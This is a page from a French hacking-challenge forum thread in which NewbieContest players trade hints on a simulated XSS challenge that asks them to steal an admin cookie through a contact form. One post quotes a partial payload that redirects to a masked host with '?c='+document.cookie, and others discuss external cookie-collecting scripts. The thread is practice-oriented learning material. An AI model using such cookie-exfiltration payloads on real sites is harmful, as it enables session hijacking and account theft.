logo Homepage
+  NewbieContest
|-+  Challenges» Aide Hacking» Hacking - Une histoire de porte
Username:
Password:
Pages: 1 2 [3] 4 5 ... 25
  Retourner à l'épreuve    Imprimer  
Auteur Fil de discussion: Hacking - Une histoire de porte  (Lu 227147 fois)
zours

Profil challenge

Classement : 553/54283

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #30 le: 21 Mars 2007 à 11:04:11 »

Je pense que tu dérives. Le type de faille à utiliser, et en partie la méthode, même, sont déjà expliqués sur d'autres pages de ce topic. Il suffit de lire.
Journalisée
StCyr
Profil challenge

Classement : 2202/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 29


Voir le profil
« #31 le: 07 Avril 2007 à 13:50:22 »

Il faut faire du "social engineering" avec l'email?
Journalisée
Moft
Profil challenge

Classement : 1742/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 14


Voir le profil
« #32 le: 07 Avril 2007 à 17:27:11 »

Si seulement c'était ça. Mais bon vu le topic et les informations fournies c'est pas ça Enfin bon je vais continuer à chercher...c'est le meilleur moyen que j'ai de trouver.
Bons challenges à tous.
Journalisée

moft
Hrusdik
Profil challenge

Classement : 5990/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 1


Voir le profil
« #33 le: 08 Avril 2007 à 22:15:24 »

Bonjour, j'arrive meme pas a exploiter la faille X** dans les formulaires du mail ni dans l'url.
C'est de ma faut ou bien ... ?
Journalisée
Rhesus

Profil challenge

Classement : 908/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 21


Voir le profil
« #34 le: 09 Avril 2007 à 09:21:37 »

Quand un truc marche pas sur NC c'est soit que tu fais fausse route, soit que c'est ta faute ! En lisant ce topic, tu pourras surement déduire la réponse seule !
Sinon moi ce qui m'a bloqué dans cette épreuve, c'est que je n'imaginais pas qu'elle soit si réaliste, comme cela a déjà été dit ...
Have a good time !
Journalisée
frok

Profil challenge

Classement : 1373/54283

Membre Junior
**
Hors ligne Hors ligne
Messages: 70


Voir le profil
« #35 le: 11 Avril 2007 à 15:58:10 »

un peu d'aide svp /!\

j'arrive a faire des alertes,des locations etc..mais là j'essaye de faire une redirection vers **********?c='+document.cookie)"> mais le
Code:
'
fais tout foirer!
Je suis sur la bonne voie mais faut une autre methode ou je suis H.S:|?
Journalisée
StCyr
Profil challenge

Classement : 2202/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 29


Voir le profil
« #36 le: 11 Avril 2007 à 16:55:05 »

Citation de: frok
mais là j'essaye de faire une redirection vers **********?c='+document.cookie)"
Je comprends pas à quoi il sert ton '

Tu travaille bien dans index.php?

Si oui, regarde bien le source de la page généré ça devrait t'aider.

Ceci dit, moi je rame toujours dessus...

Je pense qu'il faut la jouer plus réaliste que ça (comme ils disent )
Journalisée
Moft
Profil challenge

Classement : 1742/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 14


Voir le profil
« #37 le: 11 Avril 2007 à 19:10:18 »

J'ai une petite question, j'espère pas trop méchante:
Est-ce que l'on a besoin d'un script extérieur pour récupérer nos biscuits,
ou les pages fournies avec l'épreuve suffisent-elles ?

Bons challenges
Moft *qui a le cerveau fondu*
Journalisée

moft
StCyr
Profil challenge

Classement : 2202/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 29


Voir le profil
« #38 le: 11 Avril 2007 à 20:03:59 »

J'ai une petite réponse que j'espère pas trop méchante

Oui normalement on a besoin d'un script extérieur pour récupérer les miam-miam

Sauf qu'ici on est dans une simulation de faille. Donc le script extérieur est pas vraiment nécessaire.

Avec ça si tu trouves pas...
Journalisée
IoNAce
Profil challenge

Classement : 2112/54283

Membre Junior
**
Hors ligne Hors ligne
Messages: 63


Voir le profil
« #39 le: 14 Avril 2007 à 18:57:51 »

Il y a un site (que Zours a deja mentionne dans un autre topic ou sur la shoutbox) qui reference pas mal d'exploits en tout genre. Disons que ce site propose des petits plus qui sont assez explicites et m'ont beaucoup aide pour executer la faille... a vous de trouver

PS : c'est une epreuve simulee, gardez le a l'esprit
Journalisée
mito

Profil challenge

Classement : 12989/54283

Membre Junior
**
Hors ligne Hors ligne
Messages: 61


Voir le profil
« #40 le: 15 Avril 2007 à 16:33:34 »

Une faille sur l'image je ne la voie pas(zours stp tes lunette? )
Je sais utiliser du javascript en local mais sur le serveur de nc ,ils doivent filtrer ce qui est logique.
Journalisée

capitaliste:art de manipuler une population .
sarkosyste:art de rassembler une population par l'apparence.
IoNAce
Profil challenge

Classement : 2112/54283

Membre Junior
**
Hors ligne Hors ligne
Messages: 63


Voir le profil
« #41 le: 15 Avril 2007 à 22:31:56 »

Arf tu part dans la mauvaise direction. Comme on l'a deja dit, fais les choses par etapes :
- quelle est le type de la faille
- chercher la documentation
- comment l'exploiter
- appliquer limite betement (j'ai dit limite )

T'en dir plus serais donner la reponse mais faut pas chercher midi a 14h

Citation de: MoiMeme
PS : c'est une epreuve simulee, gardez le a l'esprit
Journalisée
decalecatow
Profil challenge

Classement : 11812/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 1


Voir le profil
« #42 le: 18 Juin 2007 à 13:49:42 »

petite question: le formulaire contact.php est-il censé faire ce pour quoi il semble être prévu ? en gros, est ce qu'on est censé recevoir un mail en l'utilisant normalement ?

meric d'avance pour vos réponses
Journalisée
Zmx

Profil challenge

Classement : 71/54283

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 559


Voir le profil WWW
« #43 le: 18 Juin 2007 à 21:05:04 »

Non, c'est l'admin qui est censé recevoir le mail.
Journalisée

toussa
Profil challenge

Classement : 1291/54283

Néophyte
*
Hors ligne Hors ligne
Messages: 3


Voir le profil
« #44 le: 03 Juillet 2007 à 21:52:05 »

pour ceux qui trouve les cookies mais avec rien à l'interieur, je vous conseille de re-tester.
c'etait mon cas, et en re-testant ca marche
Journalisée
Pages: 1 2 [3] 4 5 ... 25
  Retourner à l'épreuve    Imprimer  
 
Aller à: